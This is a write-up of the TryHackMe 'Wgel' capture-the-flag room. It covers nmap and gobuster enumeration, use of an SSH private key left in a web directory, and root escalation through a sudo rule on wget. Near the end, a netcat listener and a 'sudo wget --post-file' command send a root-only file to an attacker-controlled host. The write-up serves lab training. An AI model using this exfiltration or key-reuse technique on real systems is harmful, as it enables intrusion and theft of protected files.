TryHackMe: Wgel write-up
In this article we’ll tackle an easy CTF on TryHackMe. We’ll enumerate a Linux box, find misplaced credentials and exploit a common Linux tool to escalate our privileges and exfiltrate information.
Link: https://tryhackme.com/room/wgelctf
Difficulty: Easy
Authors: MrSeth6797
First steps and enumeration
Our journey into this CTF challenge begins with a comprehensive nmap
scan to identify active services on the target machine. The scan revealed two open ports: an HTTP server on port 80 and SSH on port 22, indicating potential targets for exploration. The HTTP server is running Apache httpd 2.4.18 on Ubuntu, while the SSH service is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8.:
$ nmap -sV -sT -p- -oN nmap/full-scan.nmap $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 15:18 CET Nmap scan report for 10.10.222.165 Host is up (0.042s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds
It looks like the web server hosts the default web page bundled with Apache installation. However a quick GoBuster scan with the directory-list-lowercase-2.3-medium.txt
list shows that there is something more than meets the eye:
$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | tee gobuster.log =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.222.165 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /sitemap (Status: 301) [Size: 316] [--> http://10.10.222.165/sitemap/] Progress: 62904 / 207644 (30.29%)
There’s a hidden /sitemap directory. An inspection of the website’s source code also revealed a comment potentially hinting at a username:
<!-- Jessie don’t forget to udate the website. -->
The detail noted appears to be a potential username, which could be important later on. Next, we visited the /sitemap
area of the website.
It’s a template from ColorLib, but nothing stood out at first. To dig deeper, I used GoBuster
for a directory search. When the initial scan with one wordlist didn’t show results, I switched to the DirBuster wordlist for a more thorough search:
$ gobuster dir -u http://$IP/sitemap -w /usr/share/wordlists/dirb/common.txt | tee gobuster-sitemap.log =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.222.165/sitemap [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /.ssh (Status: 301) [Size: 321] [--> http://10.10.222.165/sitemap/.ssh/] /css (Status: 301) [Size: 320] [--> http://10.10.222.165/sitemap/css/] /fonts (Status: 301) [Size: 322] [--> http://10.10.222.165/sitemap/fonts/] /images (Status: 301) [Size: 323] [--> http://10.10.222.165/sitemap/images/] /index.html (Status: 200) [Size: 21080] /js (Status: 301) [Size: 319] [--> http://10.10.222.165/sitemap/js/] Progress: 4614 / 4615 (99.98%) =============================================================== Finished ===============================================================
There is a very interesting hidden directory called .ssh. If we take a peek inside we find an SSH private key. We can make a handy backup copy of it on our machine and use it with the username jessie
to access the target box. Inside Jessie’s Documents directory we can finally get the user flag.
Privilege escalation
After gaining access to the system, we proceeded to further enumerate its configuration. A quick check with sudo -l
revealed a particularly interesting privilege assigned to the user jessie
. The system allows jessie
to execute wget
as root without the need for a password:
$ sudo -l Matching Defaults entries for jessie on CorpOne: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User jessie may run the following commands on CorpOne: (ALL : ALL) ALL (root) NOPASSWD: /usr/bin/wget
Since we can’t see what’s inside the /root
directory, but guessing that the root flag might be called root_flag.txt
(just like the user flag was named user_flag.txt
), we can use wget
to try and grab it.
First, let’s set up a listener on our local machine to receive the file. This can be done using netcat
:
$ nc -vlnp 1337
Now let’s use wget
to send the contents of the root_flag.txt
file from the target system to our listener:
$ sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337
And just like that, we capture the root flag right in our terminal.
Recent comments